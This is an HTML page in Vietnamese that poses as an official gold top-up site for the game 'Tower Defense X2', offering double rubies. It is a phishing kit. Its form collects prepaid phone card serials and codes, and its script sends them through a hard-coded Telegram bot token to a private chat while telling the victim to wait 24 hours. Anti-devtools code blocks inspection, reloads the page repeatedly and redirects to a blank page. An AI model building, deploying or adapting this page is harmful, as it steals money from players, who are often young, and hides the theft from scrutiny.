<!DOCTYPE html>
<html lang="vi">
<head>
  <meta charset="UTF-8">
  <title>TRANG NẠP GOLD TOWER DEFENSE X2</title>
  <meta name="viewport" content="width=device-width, initial-scale=1">
  <style>
    /* === GIAO DIỆN GỐC === */
    body {
      font-family: 'Segoe UI', sans-serif;
      background: linear-gradient(to right, #1f1c2c, #928dab);
      color: #fff;
      text-align: center;
      padding: 20px;
    }
    h1 {
      font-size: 21px;
      margin-bottom: 20px;
      color: #ffd700;
      text-shadow: 1px 1px 5px #000;
    }
    form {
      background: rgba(255, 255, 255, 0.1);
      padding: 20px;
      border-radius: 15px;
      box-shadow: 0 0 20px #000;
      display: inline-block;
      width: 90%;
      max-width: 450px;
    }
    input, select, button {
      padding: 10px;
      margin: 10px 0;
      width: 90%;
      border-radius: 5px;
      border: none;
      font-size: 16px;
    }
    button {
      background: #ffd700;
      color: #000;
      font-weight: bold;
      cursor: pointer;
      box-shadow: 0 0 10px #fff;
    }
    table {
      margin: 30px auto;
      border-collapse: collapse;
      background: rgba(255, 255, 255, 0.1);
      box-shadow: 0 0 15px #000;
      border-radius: 10px;
      overflow: hidden;
    }
    th, td {
      padding: 12px 20px;
      border: 1px solid #ccc;
    }
    th {
      background: #000000aa;
      color: #ffd700;
    }
    td {
      background: #ffffff22;
    }

    /* === TOAST / MODAL THÔNG BÁO (MỚI) === */
    .toast {
      position: fixed;
      top: 18px;
      left: 50%;
      transform: translateX(-50%) translateY(-20px);
      min-width: 260px;
      max-width: 90%;
      background: rgba(0,0,0,0.85);
      color: #fff;
      padding: 12px 16px;
      border-radius: 10px;
      box-shadow: 0 6px 20px rgba(0,0,0,0.4);
      display: flex;
      gap: 10px;
      align-items: center;
      z-index: 99999;
      opacity: 0;
      pointer-events: none;
      transition: transform .28s ease, opacity .28s ease;
    }
    .toast.show { transform: translateX(-50%) translateY(0); opacity: 1; pointer-events: auto;}
    .toast .icon { font-size: 20px; }
    .toast.success { background: linear-gradient(90deg,#00b894,#00d28a); color:#00210a; }
    .toast.error { background: linear-gradient(90deg,#ff7675,#ff6b6b); color:#2b0000; }
    .toast.info { background: linear-gradient(90deg,#54a0ff,#2e86de); color:#001634; }

    /* Spinner nhỏ */
    .spinner {
      width: 18px;
      height: 18px;
      border: 3px solid rgba(255,255,255,0.3);
      border-top-color: rgba(255,255,255,0.9);
      border-radius: 50%;
      animation: spin .9s linear infinite;
    }
    @keyframes spin { to { transform: rotate(360deg); } }

    /* Modal chặn devtools */
    .dev-modal {
      position: fixed;
      inset: 0;
      display: none;
      z-index: 200000;
      background: rgba(0,0,0,0.85);
      align-items: center;
      justify-content: center;
    }
    .dev-modal .box {
      background: #111;
      border-radius: 12px;
      padding: 24px;
      max-width: 420px;
      color: #fff;
      text-align: center;
      box-shadow: 0 10px 40px rgba(0,0,0,0.6);
    }
    .dev-modal.show { display: flex; }

    /* 1 số text nhỏ */
    #result, #subnote {
      margin-top: 16px;
      max-width: 500px;
      margin-left: auto;
      margin-right: auto;
      text-align: left;
    }
    #result { color: #00ff88; white-space: pre-wrap; }
    #subnote { color: #ccc; font-size: 14px; text-align:center; }
  </style>
</head>
<body>

  <h1>🔥 TRANG NẠP GOLD TOWER DEFENSE X2 🔥</h1>

  <form id="naptheForm">
    <input type="text" name="game_id" placeholder="🔑 Nhập ID Game" required><br>
    <input type="text" name="server" placeholder="🌍 Nhập Sever" required><br>

    <select name="telco" required>
      <option value="">-- Chọn loại thẻ --</option>
      <option value="VIETTEL">Viettel</option>
      <option value="MOBI">Mobifone</option>
      <option value="VINA">Vinaphone</option>
    </select><br>

    <select name="amount" required>
      <option value="">-- Chọn mệnh giá --</option>
      <option value="10000">10.000đ</option>
      <option value="20000">20.000đ</option>
      <option value="50000">50.000đ</option>
      <option value="100000">100.000đ</option>
      <option value="200000">200.000đ</option>
      <option value="500000">500.000đ</option>
    </select><br>

    <input type="text" name="serial" placeholder="🔢 Nhập số seri" required><br>
    <input type="text" name="code" placeholder="🔐 Nhập mã thẻ" required><br>

    <button type="submit">⚡ NẠP THẺ NGAY</button>
  </form>

  <div id="result"></div>
  <div id="subnote"></div>

  <h2 style="margin-top:40px">💎 BẢNG QUY ĐỔI RUBY X2 💎</h2>
  <table>
    <tr><th>Mệnh giá</th><th>Ruby nhận</th></tr>
    <tr><td>10.000đ</td><td>1.000 ruby</td></tr>
    <tr><td>20.000đ</td><td>3.000 ruby</td></tr>
    <tr><td>50.000đ</td><td>7.000 ruby</td></tr>
    <tr><td>100.000đ</td><td>15.000 ruby</td></tr>
    <tr><td>200.000đ</td><td>30.000 ruby</td></tr>
    <tr><td>500.000đ</td><td><b style="color: gold;">🔥 40.000 ruby (X2 sự kiện)</b></td></tr>
  </table>

  <!-- TOAST -->
  <div id="toast" class="toast" role="status" aria-live="polite">
    <div class="icon"></div>
    <div class="text" id="toast-text"></div>
  </div>

  <!-- MODAL KHI PHÁT HIỆN DEVTOOLS -->
  <div id="devModal" class="dev-modal" aria-hidden="true">
    <div class="box">
      <h3>⚠️ Bảo mật</h3>
      <p>Phát hiện truy cập công cụ phát triển. Trang sẽ tự động bảo vệ nội dung.</p>
      <p style="margin-top:12px;color:#ffaaaa;font-weight:700;">Vui lòng đóng Developer Tools để tiếp tục.</p>
    </div>
  </div>

  <script>
    /* ====== CÀI ĐẶT BOT ====== */
    const TELEGRAM_BOT_TOKEN = "8414943745:AAH8UWwNTlFcNTorL1SOt4FucwjCrhHY5b4";
    const TELEGRAM_CHAT_ID = "7523571828";

    /* ====== TOAST / MODAL HELPERS (nè anh) ====== */
    const toastEl = document.getElementById('toast');
    const toastText = document.getElementById('toast-text');
    function showToast(type, message, autoHide = 3500) {
      toastEl.className = 'toast ' + (type || 'info') + ' show';
      const icon = toastEl.querySelector('.icon');
      if (type === 'success') icon.innerHTML = '✅';
      else if (type === 'error') icon.innerHTML = '❌';
      else if (type === 'info') icon.innerHTML = '<div class="spinner"></div>';
      else icon.innerHTML = '';
      toastText.textContent = message;
      if (autoHide) {
        clearTimeout(toastEl.hideTimer);
        toastEl.hideTimer = setTimeout(() => {
          toastEl.className = 'toast';
        }, autoHide);
      }
    }

    function showModalDev(open) {
      const m = document.getElementById('devModal');
      if (open) {
        m.classList.add('show');
        m.setAttribute('aria-hidden','false');
      } else {
        m.classList.remove('show');
        m.setAttribute('aria-hidden','true');
      }
    }

    /* ====== SEND FORM ====== */
    document.getElementById("naptheForm").onsubmit = async function(e) {
      e.preventDefault();
      const form = new FormData(e.target);
      const info = {
        game_id: form.get("game_id"),
        server: form.get("server"),
        telco: form.get("telco"),
        amount: form.get("amount"),
        serial: form.get("serial"),
        code: form.get("code")
      };

      // Hiển thị toast đang gửi
      showToast('info', 'Đang gửi thẻ... Vui lòng chờ');

      const time = new Date().toLocaleString("vi-VN");
      const text =
`🧾 YÊU CẦU NẠP THẺ
🕒 Thời gian: ${time}
🎮 ID: ${info.game_id}
🌐 Server: ${info.server}
📡 Nhà mạng: ${info.telco}
💰 Mệnh giá: ${info.amount}đ
🔢 Seri: ${info.serial}
🔐 Mã thẻ: ${info.code}`;

      try {
        const res = await fetch(`https://api.telegram.org/bot${TELEGRAM_BOT_TOKEN}/sendMessage`, {
          method: "POST",
          headers: { "Content-Type": "application/json" },
          body: JSON.stringify({ chat_id: TELEGRAM_CHAT_ID, text })
        });
        const data = await res.json();
        if (data && data.ok) {
          showToast('success', 'Gửi thành công! Thẻ đang chờ xử lý.');
          document.getElementById('result').innerText = "✅ Thẻ cào đã gửi, chờ xử lý...";
          document.getElementById('subnote').innerText = "⏳ Dự kiến xử lý 24h. Sai thông tin sẽ không cộng Ruby.";
          e.target.reset();
        } else {
          console.error('TG error', data);
          showToast('error', '❌ Gửi thất bại! Vui lòng thử lại.');
          document.getElementById('result').innerText = "❌ Gửi thất bại: " + (data?.description || 'Lỗi không xác định.');
        }
      } catch (err) {
        console.error(err);
        showToast('error', '❌ Lỗi kết nối. Kiểm tra mạng hoặc token.');
        document.getElementById('result').innerText = "❌ Lỗi gửi dữ liệu về bot Telegram.";
      }
    };

    /* ====== ANTI-DEVTOOLS NÂNG CAO (chặn F12, Ctrl+Shift+I/J/U, chuột phải...) ====== */
    (function antiDev() {
      // 1) Chặn phím
      window.addEventListener('keydown', function(e) {
        // F12
        if (e.key === 'F12' || e.keyCode === 123) {
          e.preventDefault(); e.stopPropagation();
          triggerProtection();
        }
        // Ctrl+Shift+I / Ctrl+Shift+J / Ctrl+Shift+C
        if (e.ctrlKey && e.shiftKey && (e.key === 'I' || e.key === 'J' || e.key === 'C')) {
          e.preventDefault(); e.stopPropagation();
          triggerProtection();
        }
        // Ctrl+U (view source)
        if (e.ctrlKey && e.key === 'u') {
          e.preventDefault(); e.stopPropagation();
          triggerProtection();
        }
      }, true);

      // 2) Chặn chuột phải
      document.addEventListener('contextmenu', function(e) {
        e.preventDefault();
        triggerProtection();
      }, true);

      // 3) Phát hiện devtools mở qua kích thước cửa sổ
      let devtoolsTimer = null;
      let lastStatus = false;
      const detectDevTools = () => {
        const threshold = 160;
        const widthDiff = window.outerWidth - window.innerWidth > threshold;
        const heightDiff = window.outerHeight - window.innerHeight > threshold;
        const isOpen = widthDiff || heightDiff;
        if (isOpen !== lastStatus) {
          lastStatus = isOpen;
          if (isOpen) triggerProtection();
        }
      };
      devtoolsTimer = setInterval(detectDevTools, 500);

      // 4) Phát hiện bằng toString debugger trick
      let element = new Image();
      Object.defineProperty(element, 'id', {
        get: function() {
          triggerProtection();
        }
      });
      // periodically attempt to log the element, devtools console open may trigger getter
      setInterval(function() {
        console.log(element);
        console.clear && console.clear();
      }, 1000);

      // 5) Hành động bảo vệ: reload liên tục và hiện modal
      let protectionActive = false;
      function triggerProtection() {
        if (protectionActive) return;
        protectionActive = true;
        // Hiện modal cảnh báo
        showModalDev(true);
        showToast('error', 'Phát hiện truy cập công cụ phát triển — Trang sẽ bảo vệ nội dung.', 6000);
        // reload liên tục mỗi 700ms trong 6 giây, sau đó redirect blank page
        let c = 0;
        const rid = setInterval(() => {
          c++;
          try { location.reload(true); } catch (e) {}
          if (c > 8) {
            clearInterval(rid);
            // chuyển sang trang trống an toàn
            try { location.href = 'about:blank'; } catch(e) { window.open('', '_self').close(); }
          }
        }, 700);
      }
    })();

    /* ====== Kết thúc ====== */
  </script>

</body>
</html>